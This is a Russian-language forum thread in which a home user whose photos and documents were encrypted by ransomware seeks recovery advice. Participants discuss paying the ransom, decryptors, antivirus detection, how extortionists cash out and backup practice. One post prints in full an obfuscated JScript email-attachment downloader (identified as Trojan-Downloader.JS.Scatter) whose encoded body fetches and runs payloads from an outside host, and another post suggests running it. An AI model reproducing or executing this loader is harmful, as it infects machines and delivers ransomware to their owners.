Вчера вечером появилась заставка на раб столе твои файлы зашифрованы, пришли один файл на мыло, а то через неделю вообще все пропадет. на диске вместо документов и фото домашнего архива, теперь такие виды файлов [email protected] 1.0.0.0.id-далее много букв. с расширением *.cbf

Да знаю, знаю многие посмеются, больше половины славо богу есть на дублирующем съемном диске, а хочется вернуть все фото и документы, ибо жена по ошибки тыкнула на ссылку в почте. Если кто нибудь реально сталкивался с такой проблемой прошу дать ценный совет, как все это восстановить?
я погуглил, ответы не однозначные, сам думаю так.
Варианты:
1. запустить прогу для восстановления файлов.
2. отписаться в лабораторию drweb
3. Рискнуть заплатить если цена вопроса меня устроит, что мало вероятно, и нет гарантий..
Если кто то имеет опыт восстановления из такой ситуации просьба помочь, заранее спасибо всем...

о боже...

(0) Узнавай скока денег хотят.

Да откатится на точку восстановления возможности нет, забыл написать.

Жене уже по пальцам настучал?

Даааа, женаааа.

http://cs.pikabu.ru/images/big_size_comm/2012-04_2/1333701533907.jpg

Странно вот говорят каспер не помогает, у меня на каспере на почту стоит запрет на исполняемые файлы и скрипты, архивы на карантин и распак только там.. Все уже есть но всем влом. Жене по шее, если копии некоторых файлов есть то оригинал и зашифрованный в каспер отправь, параллельно отпиши на это мыло, узнай сколько хотят, если что с заначки жены заплатишь

Картинка с Лавровым.жпг

Жена и так расстроилась, а то что денег хотят за раскод может тоже лохотрон или кто то платил и присылали реальные случаи есть у кого?

(8) так ты отправь один файлик перед отправкой денег, если расшифрует только после этого плати

(9) допустим они расшифруют один и что мне потом им 30000 файлов слать ))))

(10) Потом тебе дешифратор скинут.

(10) бабки слать

Можешь жену им отправить, я не против

(13) Кто ж ее вместо бабок возмет?

Все это круто почитал соседние ветки, если можно то поделу, конкретные случае, если такие встречались у вас

А что по делу?
Или бекап, или деньги слать.

(15) Я уже отписал, что нужно сделать в (2).

(15) поискать на касперыче коды дешифровки) может помочь!
Ловил такую фигню, давно было, поборол. Как - не помню=(

спасибо, за дельные советы, если кто что вспомнит как разобрался с подобной штукой, буду признателен.

Вспомнил тут...
У нас летом, при попытке запуска бухом такого скрипта в почте, НОД32 ругнулся и заблокировал выполнение скрипта.

Скрипт такой был:
"Акт - согласовано руководителем экономического отдела. Завизировано бухгалтерией. Подписано директором_ от 27.08 2015г_be16d62184b.tхt .js."

Внутри:

///// c6f74fc26f6ac4fbd57c6f74fc26f6ac4fbd57
///// 7efcd8ad8780aa7dba23fe62e8b65b961
var _0xd196="QF3AB05056B Q59CBAE85FE Scripting.FileSystemObject %temp%\\ WScript.Shell ADODB.Stream Msxml2.DOMDocument.6.0 tmp createElement dataType bin.base64 text nodeTypedValue Type Ly8vLy8gYzFiNTQyNWRiZmFiYmVjZWE3ZDE0NDYxMmJiMWIyNDA1CnZhciBfMHhjODFkPSJTY3JpcHRpbmcuRmlsZVN5c3RlbU9iamVjdCBRNzhEQjE4MUMxRSAldGVtcCVcXCBXU2NyaXB0LlNoZWxsIE1TWE1MMi5YTUxIVFRQIEdFVCBvcGVuIHNlbmQgQURPREIuU3RyZWFtIFR5cGUgUG9zaXRpb24gaHR0cDovL2Rvd25sb2FkLWF0dGFjaC5jb20vZG9jLmNzcyAgZG9jX2U3NzcuZG9jIFFBMDhCRjAxRDUwIGh0dHA6Ly9kb3dubG9hZC1hdHRhY2guY29tL2Rlc2lnbi5jc3MgZGVzaWduLmNzcyBodHRwOi8vZG93bmxvYWQtYXR0YWNoLmNvbS9pbnMzLmNzcyB2YjE0MjkxOTJiLmJhdCBRRDk0QjlBNUY1NiIuc3BsaXQoIiAiKTtmdW5jdGlvbiBRMzVBKGEpe1dTY3JpcHQuQ3JlYXRlT2JqZWN0KF8weGM4MWRbMF0pO3JldHVybiAxMH1RMzVBKCk7dmFyIHEwNzA9NDMsYjVlNWQ2PTQ4O2ZhMTRiN2Y3Nj1fMHhjODFkWzFdO2Z1bmN0aW9uIEIxODFDMUUoYSxiLGMpe3JldHVybiA5fXZhciBFQkQyPV8weGM4MWRbMl07CmZ1bmN0aW9uIENyZWF0ZU9iamVjdChhKXtyZXR1cm4gbmV3IEFjdGl2ZVhPYmplY3QoYSl9dmFyIEQ0Q0FCQzRDNTk9Q3JlYXRlT2JqZWN0KF8weGM4MWRbM10pLEVCRDI9RDRDQUJDNEM1OS5FeHBhbmRFbnZpcm9ubWVudFN0cmluZ3MoRUJEMik7ZnVuY3Rpb24gQTBFNzk5RDU2RTNCMShhLGIpe3ZhciBjPW5ldyBBY3RpdmVYT2JqZWN0KF8weGM4MWRbNF0pO2NbXzB4YzgxZFs2XV0oXzB4YzgxZFs1XSxhLDApO2NbXzB4YzgxZFs3XV0oKTtuZXcgQWN0aXZlWE9iamVjdChfMHhjODFkWzBdKTt2YXIgZD1uZXcgQWN0aXZlWE9iamVjdChfMHhjODFkWzhdKTtkLk9wZW4oKTtkW18weGM4MWRbOV1dPTE7ZC5Xcml0ZShjLlJlc3BvbnNlQm9keSk7ZFtfMHhjODFkWzEwXV09MDtkLlNhdmVUb0ZpbGUoYiwyKTtkLkNsb3NlKCl9QTBFNzk5RDU2RTNCMShfMHhjODFkWzExXSxfMHhjODFkWzEyXStFQkQyK18weGM4MWRbMTNdKTsKLy8vLy8gMDhmZmQ3ZjQ0NzhlNzUyYmM3YTA4ZmZkN2Y0NDc4ZTc1MmJjN2EKZnVuY3Rpb24gQkFCMDRCODUzMTREMDQoYSl7RDRDQUJDNEM1OS5SdW4oYSwxLDApfWZ1bmN0aW9uIFE5Q0YoYSl7V1NjcmlwdC5DcmVhdGVPYmplY3QoXzB4YzgxZFswXSk7cmV0dXJuIDl9UTlDRigpO2Z1bmN0aW9uIFE5MzIoYSxiLGMpe3JldHVybiA5fXRyeXtCQUIwNEI4NTMxNEQwNChfMHhjODFkWzEyXStFQkQyK18weGM4MWRbMTNdKX1jYXRjaChRMURCKXt9dmFyIEJEMjY3OTE9UUMxMSgyMiw2Myk7ZnVuY3Rpb24gUUMxMShhLGIpe3JldHVybiAxMzg2fVdTY3JpcHQuU2xlZXAoODIpO2Z1bmN0aW9uIFFEOTQoYSxiLGMpe3JldHVybiA0fWZ1bmN0aW9uIENEQUE5MDNGMTgxMyhhKXtENENBQkM0QzU5LlJ1bihhLDAsMCl9dmFyIHFjYTY9NTAsYjZiYzQ5PTk2O2Y4ZTdhNDYzYz1fMHhjODFkWzE0XTtmdW5jdGlvbiBCRjAxRDUwKGEsYixjKXtyZXR1cm4gOX1BMEU3OTlENTZFM0IxKF8weGM4MWRbMTVdLF8weGM4MWRbMTJdK0VCRDIrXzB4YzgxZFsxNl0pOwovLy8vLyA0NTRhMGZjZmNiZTAzNDc1MDRkNDU0YTBmY2ZjYmUwMzQ3NTA0ZAovLy8vLyA5YzBkODIzMzNlNDY5MjJjYzBhOWMwZDgyMzMzZTQ2OTIyY2MwYQovLy8vLyAzOTRjM2Q4OGVkYmVkMmQwMjQ5Mzk0YzNkODhlZGJlZDJkMDI0OQp2YXIgQjM4RkMxQT1RNzY3KDk3LDQ3KTtmdW5jdGlvbiBRNzY3KGEsYil7cmV0dXJuIDQ1NTl9V1NjcmlwdC5TbGVlcCg5MSk7QTBFNzk5RDU2RTNCMShfMHhjODFkWzE3XSxfMHhjODFkWzEyXStFQkQyK18weGM4MWRbMThdKTt2YXIgQjI3MjJCOT1RMjEzKDYsNik7ZnVuY3Rpb24gUTIxMyhhLGIpe3JldHVybiAzNn1XU2NyaXB0LlNsZWVwKDQ3KTtDREFBOTAzRjE4MTMoXzB4YzgxZFsxMl0rRUJEMitfMHhjODFkWzE4XSk7dmFyIHEzZTQ9MTUsYjI4NjcxPTI4O2Y0NDgxNTA0MT1fMHhjODFkWzE5XTtmdW5jdGlvbiBCOUE1RjU2KGEsYixjKXtyZXR1cm4gNH07CgovLy8vLyA1OTBmODkwZGYyYjAzNWE4ZmYzZWJkNjBmMDBmZWQyMTEKLy8gIDAzZDNkMDEyMTZkYTlhMTE0Njc1Mjk4OGE5M2JmMjEzOQo=  update.js".split(" "),
qa0e=4,b7404c=89;f38d9ae56=_0xd196[0];function B05056B(a,c,b){return 10}var qbae=28,b7ed3e=44;f3d7ed622=_0xd196[1];function BAE85FE(a,c,b){return 5}function Q8BB(a){WScript.CreateObject(_0xd196[2]);return 10}Q8BB();var MT33=_0xd196[3];function CreateObject(a){return new ActiveXObject(a)}var JS02=CreateObject(_0xd196[4]);function QBC8(a,c,b){return 8}function Q59D(a,c,b){return 8}var MT33=JS02.ExpandEnvironmentStrings(MT33),BF7EC1C=QAC2(47,39);function QAC2(a,c){return 1833}WScript.Sleep(73);
///// 8beb5dd9a79508aa97b8beb5dd9a79508aa97b
///// 5ad87924d17a07d0a965ad87924d17a07d0a96
///// 88e5a37a240511c4f6588e5a37a240511c4f65
///// b98b82032448bd50443b98b82032448bd50443
function QF64(a){WScript.CreateObject(_0xd196[2]);return 2}QF64();function Q2CA(a){WScript.CreateObject(_0xd196[2]);return 7}Q2CA();function JS04(a,c){var b=new CreateObject(_0xd196[5]),d=(new ActiveXObject(_0xd196[6]))[_0xd196[8]](_0xd196[7]);WScript.Sleep(71);d[_0xd196[9]]=_0xd196[10];d[_0xd196[11]]=a;d=d[_0xd196[12]];b[_0xd196[13]]=1;b.Open();b.Write(d);b.SaveToFile(c,2);b.Close()}function JS10(a){JS02.Run(a,0,0)}JS04(_0xd196[14],_0xd196[15]+MT33+_0xd196[16]);JS10(_0xd196[15]+MT33+_0xd196[16]);
///// 99e7dac855e71bb650c99e7dac855e71bb650c
qbae=28;b7ed3e=44;f3d7ed622=_0xd196[1];function BAE85FE(a,c,b){return 5};

///// 5c4a5ea66183aec4dcd0b523d3b302d63
//  c057d2fbc056b23f28472cae168417444

(20) и что это дает?

(21) Код шифровальщика. можно попробовать скопировать текст в блокнот, сохранить как "Акт - согласовано руководителем экономического отдела. Завизировано бухгалтерией. Подписано директором_ от 27.08 2015г_be16d62184b.tхt .js" запустить и посмотреть на результат.

Пока что скачал утилиту от касперыча сейчас буду пытаться выбить из него код, далее думаю попробовать рекавери файлов...

(23) шифровальщиками массово торгуют на спец.форумах, ессно, никто там не будут продавать то, на что есть дешифровщик ЛК. Пиши изомеру, в письмах тупи побольше, денег нет, и т.п. - с двадцатки реально сторговать до пары-тройки тысяч.

Вообще, вызывает очень большие вопросы следующие факты:
1. детектировать эвристикой шифровку файлов - не такое сложное дело, благо шифровальщики писаны пионерами на дельфях. Ни ЛК, ни доктор веб почему-то этого не делают.
2. Продажа модулей - почему бы превентивно не выкупать тело шифровальщиков, чтобы добавить их в сигнатурный анализ до рассылки, а не через неделю после? Тем не менее - этого никто не делает.
Налицо большой заговор :)

(25) > благо шифровальщики писаны пионерами на дельфях.
Это было лет 5 назад. Современный шифровальщик - чаще всего вполне качественно сделанное ПО, которое обрабатывает дисковые и сетевые ошибки и использует в своей работе криптоапи и стойкое шифрование.
> Продажа модулей - почему бы превентивно не выкупать тело шифровальщиков чтобы добавить их в сигнатурный анализ
А кто сказал что оно одинаковое? Экзешник может быть запакован с шифрованием, а исполняемый код обфусцирован уникальным образом для каждого "клиента". Пришел запрос по ссылке - робот "выдал" клиенту не один и тот же экзюк, а очередной, уникальный.

я понял так, что пионеры давно либо канули в прошлое, либо подрабатывают на неблагодарных ролях общения с "клиентами" по почте (и их же, этих пионеров, как раз и выщемит отдел "К" в случае чего). А денежки с этого получают более чем серьезные дяди, которые и нанимают правильные абузоустойчивые хостинги, высококвалифицированных программистов и т.п. В общем, полноценный криминальный бизнес.

(22) вряд ли это код шифровальщика, маловат. Скорее всего это обфусцированный код, который подгружает и запускает шифровальщик.

Во-первых, в "замечательном" теле есть Scripting.FileSystemObject для записи объекта на диск,
во-вторых, есть WScript.Shell для запуска процесса.
Есть ADODB.Stream для раскодирования Base64

И также упоминается update.js, который, видимо, будет откуда-то скачан.

(27) Не, это как раз пионеры, гопниковский слог в переписке виден явно. Никто никакие хостинги не нанимает, файло льется на чужие взломанные аккаунты. Шифровальщики пишутся массово, продаются за копейки, там сплошной гумнокод и ошибки. Единственное что там есть интеллектуального - превентивная модификация от детектирования антивирусами. Отдел К этим заниматься не будет.

(21)
Возможно кому то удастся понять как это дело работает.
Но это загрузчик шифровальщика только, да.

Сейчас кстати даже MS Security Essentials на него ругается, в их антивирусных базах такой уже есть.

(30) Пишут далеко не пионеры - пионеры только пользуют.

ПО итогу жмакнув на ссылку комп скачал js далее по логам запустились нужные службы причем теперь они даже неподвластны мне как администратору, далее пошли кодироватся все файлы и только в последнюю очередь файлы рабочего стола и далее на экран заставке вышел привет лузер пиши сюды.
Попробовал утилиту от касперыча RannohDecryptor взял испорченный фаил и такой же целый - итог шлак.
Далее сделал рековере файлез с флешки восстановил, но утилита бесплатная вся хронология нарушена что без литра не разобраться, а мой фото архив за последний год плюс фото наработки все медным тазом ((( как на зло всегда был бек ап всего этого, а пол года назад потерял переносной жесткий в квартире, и хард 2й пошел на мусорку, и тут бац держи краба...

(20) Скопировал этот текст в 1.js, Касперский тут же ругнулся на Trojan-Downloader.JS.Scatter.t
Делаю вывод: сигнатура этих шифровальщиков есть в базе антивирусных программ. А это значит, что нужно потратить 1-2тр и поставить себе антивирус.

Кстати, на форуме Касперского пишут, что не смогут помочь с расшифровкой. Увы(.

(34) NOD32 так же отреагировал, JS/TrojanDownloader.Agent.OCL

(33) ну кто ж так к бэкапам относится. Их беречь надо. Я вот, к примеру, знаю точно, что если с моими данными за последние 10 лет что-то случится, то лучше сразу пойти и повеситься. Поэтому бэкапы в нескольких надежных местах, да.

Это жо О_О

(37)++
Я вообще параноик по поводу бэкапов.
Все важное храню на дублирующем внешнем винте. Обновляю раз в месяц, а если много что на комп закачал или поменял, то сразу же.
Плюс акронисовский образ системного раздела там же. Один раз помогло при заражении компа трояном-вымогателем, но то не шифровщик был, а отображал заставку при загрузке, что надо перевести бабки куда то там.

Плюс дубль в облаке на 100 Гиг.

Ключ шифрования никогда не содержится в теле шифровальщика, он либо генерируется случайный и отправляется на сервер, либо запрашивается с сервера.
Т.е разбирать и анализировать шифровальщик это бессмысленно.

(39) ну, у меня не так много, то что для меня имеет значение - порядка 30-40 гиг. К фоткам и прочему тяжелому контенту такого плана отношусь абсолютно равнодушно. Речь только о наработках по работе - документы и код.

(34) Это сейчас есть.

(40) если асимметричный алгоритм, то да. Но народ надеется на то что именно им достанется шифровальщик пионера Васи с ксором на коротком ключе...

(30) Самое трудное в этом бизнесе - вывести деньги.
Пионер палиться на раз.

Обычно занимаются этим нормальные такие преступные синдикаты, у которых есть куча дропов(наркоманы которые будут обналичивать)

Хотя бывают и студенты. Если попадешь на студентов - данные уже не восстановишь.
У первых инфраструктура, и длительный бизнес.
А студенту чисто деньжат разово урвать, они обычно сохранением ключей не заморачиваются.

(43) Да зачем там ассиметричный, он медленный, обычный AES.
Больше ничего не надо.

(45) а AES это что, по-вашему?

(46) АЕS это симметричный алгоритм.
Довольно стойкий, используется повсеместно.

хотя точно, он симметричный. Но ключ восстановить все равно нельзя

(48) Ассиметричный алгоритм нужен только для пересылки по открытому каналу.
И только для этого используется - чтобы спокойно переслать открытый ключ.

А уже после обмена ключами и установления шифрованного канала, по этому каналу обмениваются обычными симметричными ключами, тем же AES и шифруют.

Так https работает, и прочее подобное.

Ассиметричный по производительности на пару порядков хуже.

(44) Какая проблема с выводом?

(50) Деньги это такая штука которую надо обналичить.
Все платежи отслеживаются.
Сейчас правда появился вариант - биткойн, через него прогнать, тогда можно и одиночке.

(50) Кошельки могут быть палеными - человек, который будет платить вымогателям, может написать заяву в органы и сдать кошелек, соответственно это может привести к тому что возьмут того кто будет снимать деньги

(42) Он в базе с 2014 года есть
"С 25 июля 2014 по 25 января 2015 года мы обнаружили 5989 атак с использованием Trojan-Downloader.JS.Scatter на 3092 пользователей"

полную анонимность дает лишь биткойн и подобное. Все киви, вебмани, ЯД и прочее - отслеживается на раз

(52) Ну обычно выводят не через кошельки, а через банковские карты.
Человек идет снимать, рядом дежурит бригада контролеров.
Если снял удачно - забирают деньги.
Если забрали - он никого не знает.

(55) перевод на карту у шифровальщиков? Обычно там биткойн или на худой конец киви-кошелек какой-нибудь одноразовый

а дальше, я так понимаю, цепочка операций с выводом на какую-нибудь левую карту. Хотя необязательно, может быть безналичная оплата каких-нибудь услуг, тех же хостингов.

(57) Оплата услуг, товаров, это палево.
Либо на левую кредитку и обналичивает дроп.
Либо через биткойн и там уже спокойный вывод отмытых денег.

(58) Я о чем - дядя нынче биткоины просят.

(37) и что же там такого ВАЖНОГО в данных, что прям повеситься...?

(0) "полегло почти всё" - я уже подумал, что криптовири научились сеть уронить ..

(0) Даже ФБР признает: если вас поимели не школьники, самый простой выход - заплатить. https://securityledger.com/2015/10/fbis-advice-on-cryptolocker-just-pay-the-ransom/

Что ж, через пару лет хоть бэкапы научатся делать...

(62)Просто трудозатраты на дешифровку не сравнимы с ценностью данных.

(63) в некоторых конторах потеря данных была серьезным ударом по бизнесу )

плохая тенденция в последнее время  -- некоторый "билль о договореностях" (пер. с англ.) нарушен - некоторые криптовымогатели не соблюдают договоренности, не дешифруют. Это сильно бьет по бизнесу в целом.

(64) И тем не менее.

(60) наработки за 10 лет. Сотни метров проектов исходных кодов на разных языках - начиная с последних лет институа и вплоть до того, что написано и работает в разных организациях. Документация - как найденная, так и написанная самостоятельно. Разнообразные данные доступа к ресурсам. Почтовая переписка, в конце концов.

ну, есть еще всякая ерунда типа личных фото. Это тоже было бы неприятно потерять, но без этого не останешься как без рук во всяком случае.

вообще если честно, меня удивляет, как у людей на этом форуме возникают подобные вопросы. Неужели никто не сохраняет свои наработки и не использует их впоследствии? Лично для меня ценность моих данных - это все равно что ценность денег которые я зарабатываю. Одно и то же по сути.

(65) А по-моему хорошая тенденция. Если вымогатели перестанут дешифровать, жертвы перестанут платить, и бизнес загнется. Не удивлюсь, если гипотетический Анонимус сообразит это и поможет делу, распространяя шифровальщики, которые ничего не дешифруют.

(0) Удаляй, удали все, Жене привет, и спасибо... хот избавитесь от информационного мусора :)

(70) "шифровальщики, которые не дешифруют" - это тупо деструктивный код. Например, пишущий случайные байты в файлы поверх данных. Во времена ДОС был вагон и маленькая тележка подобных вирусов. К концу 90-х, к счастью, подобные вещи сошли на нет. И да, уродовали в основном системные файлы, пользовательские уничтожали редко

(69) Все наработки под 7.7 выкинул. Под обычные формы - что-то уже тоже выкинул. Старые конфы - выкинул, ибо пишу куда лучше теперь и без слез смотреть на старый код не могу.  Фото - подумал и не стал делать бэкап, тк никто их не смотрит. Что выложено в сеть - то не умрет, а что валяется на локальных хранилищах - и х с ним.

То что пишу не на 1с - валяется на гитхабе ) и локально мне нафиг не надо делать бэкапы.

(0)
http://i73.fastpic.ru/big/2015/1101/63/b475c92dc72cf5d55470f8b01f6d7063.png

from
http://www.yaplakal.com/forum7/topic1234351.html

(72) Не совсем так.
Это точно такой же шифровальщик, просто распостранитель не заморачивается дешифровкой.
Получил деньги и исчез.

(69) ценность она не терабайтах а в голове

(0) попробуй вот эту утилитку от дрвеба https://drive.google.com/open?id=0BxXTxkwVey2FT25tUVpLZkdaSTQ

(78) Хорошая шутка.

(78) спасибо попробую, написал эти дядям из украины они хотять 15 К рупи написал что я такие деньги за 3 месяца зарабатываю, на отрыжках перебьются. Вчера понял что
Варианты у меня только такие:
1. это нужно прогнать всеми прогами от касперского с пометкой crypto - прогнал толку нет
2. это написать в доктор веб если есть лиц пол года как- тоже мимо
3. заплатить врагам - но не факт что все пришлют.Дорого.
4. Обратится в стороннюю фирму, чуть дешевле но тоже без гарантий что все вернется на круги своя.
Вывод: еще раз повторюсь бэкаимся на 2 съемных винчестера через раз меняя их будет счастье)))
Сегодня не бился с невидимым врагом, ну так часок разве что настроил 2-й комп старенький для того чтоб ssd диску сделать рекавери, благо полу живой винт еще работает)), а вось что то нужное восстановится. Ну и будем-с ждать либо каспера бесплатного либо поищу знакомых с лицензией Доктор веб, вот как то так, спасибо за советы всем..

(78) не помогло, все равно спасибо

(0) Сталкивались
Опыт какой-то есть по базам, но, есс-но не дешифрования

http://1c911.by/stati_1s/statya-vosstanovlenie-bazy-1s-77-email-deskripshen1cgmailcom.htm

http://1c911.by/stati_1s/statya-vosstanovlenie-bazy-1s-77-sa-file.htm

В принципе антивирусные лаборатории могут помочь (наверное)... хотя я сомневаюсь

(69) Скажем так - для меня потерять данные это очень неприятно, и вызовет кучу проблем и финансовые потери.
Но критичным я бы это не назвал.

(80) Пункт 4можно сразу исключить, в нем нет смысла если не помогли первые два.

(86) от чего же если мне пришлют расшифрованный фаил, а далее ты оплачиваешь фирме

(76) Ну а какая с точки зрения хозяина инфы разница, как именно искажается инфа, если способа восстановить ее нет?

(87)А каким образом сторонняя фирма может расшифровать файл?
Это возможно только в случае заранее известного ключа, или банального ксора. А такие случаи и антивирусы обрабатывают, у них опыт поболее.
(88)Ну почему же нет.  Есть, просто восстанавливать тебе никто не хочет, хотят просто денег получить.

(89) Вот откеда у них дешифраторы я хз ),
По сабжу написал запрос в ДРвеб так как нашел у кого есть ключ более 6 месяцев кинули зарос жду-с

(90) Долго ждать придется, через пару сотен лет может дождешься.

(7) Название темы увидел - тоже про картинку с Лавровым сразу подумал.

Скажите линух от подобного надежней?

(93) Вообще под него шифровальщиков не видел пока, но все от прокладки зависит - если юзер под рутом работает, никакой линух не поможет.

(69) Информация, конечно, важная... но чтобы "прям повеситься..." - это однозначный перебор.
ИМХО, нельзя ТАК зависеть от информации, вещей и даже людей...

(93) Пока да. Пока базы на нем все не держат.

(94) С рутом или без рута шифровальщику пофиг.

(69) Вообще ничего не храню. Старые наработки давно неактуальны, ценность их нулевая. Фотографии - ну в гугл они автоматом сбрасываются, не удаляю их оттуда. Пропадут - да и хрен с ними. Все важные пароли - в голове. Номера телефонов - опять же в гугле, да и они не важны, все нужные контакты можно с полпинка найти либо в соцсетях, либо через знакомых.

В принципе, единственное, что критично - почтовый ящик, т.к. на него завязан ряд сервисов и аккаунтов. Но на нем сложный уникальный пароль (опять же в голове) и двухфакторная аутентификация.

Самое ценное - голова на плечах, остальное приложится.

(97) странно. Я очень часто в процессе работы использую то что делал раньше, иногда смотрю какие-то вещи на разных языках, которые делал многие годы назад, и переношу их в новые разработки. Если бы было по-другому, мне нужно было бы в десятки раз больше времени на мою работу...

по некоторым вещам, которые неочевидны, я пишу каменты и даже описалово в ворде, которое потом читаю. Это все хранится у меня.

(0) Спасибо, сделал выводы для себя

(100) не полегчает обращайся еще )))
Завтра начну делать рекавери всех файлов, мутно геморно, найти бы прогу или посоветуйте чтоб после восстановления структуру имен сохраняла прога.

(0) жена под учеткой с админскими правами?

(102) Скорей всего, Учетка одна, без пароля. Семейный очаг строится на доверии :)

(97) Ваши пароли, тоже уже все у Гугла ;)

восстановить с флешки получилось, помогли р-студио, и рестор2000, а вот с ЖД почему то ни чего не воссатнавливается....

(105) ну так он перезаписал на диске большую часть, а вот на флешке если свободное место было то простов свободные ячейки впихнул

Ответ от Др веб пришел, и очень улыбнул меня вот он в крации.
На данный момент расшифровка нашими силами видится невозможной.
Таким образом, основная рекомендация : обратитесь с заявлением в территориальное управление "К" МВД РФ;
по факту несанкционированного доступа к компьютеру, распространения вредоносных программ и вымогательства.
Образцы заявлений, а также ссылка на госпортал ("Порядок приема сообщений о происшествии в органах внутренних дел РФ")

Что значит “в крации“?

Пока здесь только надежда на Каспера. А кому как не ему.

Антивирус на удаление  у Каспера начинает работать после того когда в вирусную базу попадет сам идентификатор оригинала вируса. Строго. Все не берется ниоткуда.

(108) Это примерно как Гораций.

(110) я отправил логи с АВЗ прям им на сервер мало ли обработают

(112) Насколько я понимаю, собственно исполняемый компонент шифровщика, который ищет файлы и дергает функции криптоапи для шифрования, обычно уничтожается после того, как он закончил работу. Поэтому "постфактум" вряд ли там что-то дельное найдется.

(0) К тебе по удаленному зашли всего скорее. У меня были уже преценденты с такими шифровальщиками

Решения данного вопроса выходит нет. Хреново. У нас даже часть бэкапов зашифровал.

Хреновая эпидемия, может самому начать так бабки сшибать?

(107) Ну а что еще они тебе могли сказать?

тебе сразу сказали, что расшифровывать этот экзорцизм - нет никакого смысла. В день рождаются лютые тыщи этих вирей, с дикими ключами, какой идиот их будет расшифровывать, тем более если это практически невозможно?

(115) Этой эпидемии уже лет пять-семь

(115) Чтобы бэкапы не шифровал - отбери права на запись в архив у всех.
Чтобы ни один хрен входящий в группу Администраторы, не мог туда ничего записать.

(119) а будут делаться бэкапы после таких манипуляций?

(120) Под учеткой с правами записи вестимо.

копии делает Хранитель Гендалевский, серверок играет роль рабочей станции, т.е. на ней проверяют и почту и выходят в интернет, по ВиТерминалу к нему подключены еще пять пользователей.

Хочется автоматом, а не прыгать из учетки в учетку и делать копии, тем более меня там нет постоянно, а бух и делать не будет.

Попробуй с помощью EasyRecovery вытащить файлы.

(123) Хранитель делает дубликат на флешку, а шифровальщик не затрону почему-то флешку, вот поэтому мне повезло, восстановил и продолжают работать.

(120) Разумеется.
У пользователя который делает бэкапы - должны быть права на чтение всего что надо бэкапить, в частности теневых копий, и на запись в архив.
А вот у всех остальных, включая администраторов прав на запись в архив не должно быть.

Т.е вы зайдя админом на компьютер не должны иметь возможности удалить или изменить архив.

(124) Я вообще-то о том что если с файлами работали / шифровали / удаляли / перезаписывали всегда сохраняются предыдущие данные в виде свободных блоков.

(122)Не знаю что за хранитель такой, но не суть.
Сделай пользователя для бэкапа, убери этого пользователя из меню входа, дай ему соответствующие права, и запускай своего хранителя или чего там, под этой учеткой.
Все.
А у всех остальных отбери права на запись в бэкап.
(124) Повезло, не так давно сталкивался с шифровальщиком - все с бэкапа восстановили, а вот флешка с банковскими ключами была зашифрована, и пришлось бегать восстанавливать.

(123) Фигня полная.
Это невозможно.

(126)Чем это вам поможет?
Да запись как правило ведется в другое место, но старое место помечается свободным, а процессов осуществляющих запись у нас на компьютере дофига, поэтому все это затирается очень быстро.
И тут можно говорить не о восстановлении, а о попытке спасти некторые данные путем анализа диска - это долго, ресурсоемко, и в большинстве случаев не дает никакого эффекта.

(127) ясно, спасибо, надо делать, пока бухи в шоке, напугал их, теперь хоть с неделю думать и читать будут, что открывают на почте...

(127) гэндальф это такая кривая поделка для тех, кто не знает что такое энтибекап, шадоукопи и тупо скрипт с архиватором.

то есть если человек сказал "гэндальф" - с его квалификацией в элементарных вещах все понятно

(127) последний крипто поймали на неделе: привинченный том закрпитовал, десктоп в шаре и документы в шаре - не смог. Видимо совсем дети делали.

+ инфицирование тоже без затей, акт сверки.экзе

(130) В качестве превентивных мер - запрети хотя бы запуск программ из папки в которую качает браузер, или почтовая программа с которой они работают.
Это не панацея, но тут хотя бы появляется некоторая осознанность в действиях.

Без этого даже предупрежденный бух, на автомате, когда сроки по отчетности горят, откроет что угодно, а потом подумает.

(135) пока он будет разбираться с локальными политиками -- может быть проще ему осилить простейшие средства резервирования данных? тот же шэдоу ежедневный полностью снимет опасность грязного увольнения

(136) Ну бэкап это само собой, это даже не обсуждается.
Политики это превентивные меры, они не предотвращают опасность полностью, но несколько снижают риск.

Из бэкапа  тоже восстанавливать не самая приятная вещь- теряется время, и небольшая часть данных.

собираем урожай с выходных

http://c2n.me/3q2my8i

(5) > Даааа, женаааа.

+1
Хорошая жена сбережет вам 100-200 гб. на диске и защитит от вирусов-шифровальщиков ))))

(39) Я канеш знал, что ты параноик. Но чтоб настолько! )

(118) Давали бы за это лет по 10 всем участникам (и прогеру, и тому, кто денюжку собирает). Да с полной конфискацией в пользу пострадавших...

(115) Вчера тут приходила  в связной и спрашивала могут ли ей за деньги расшифровать....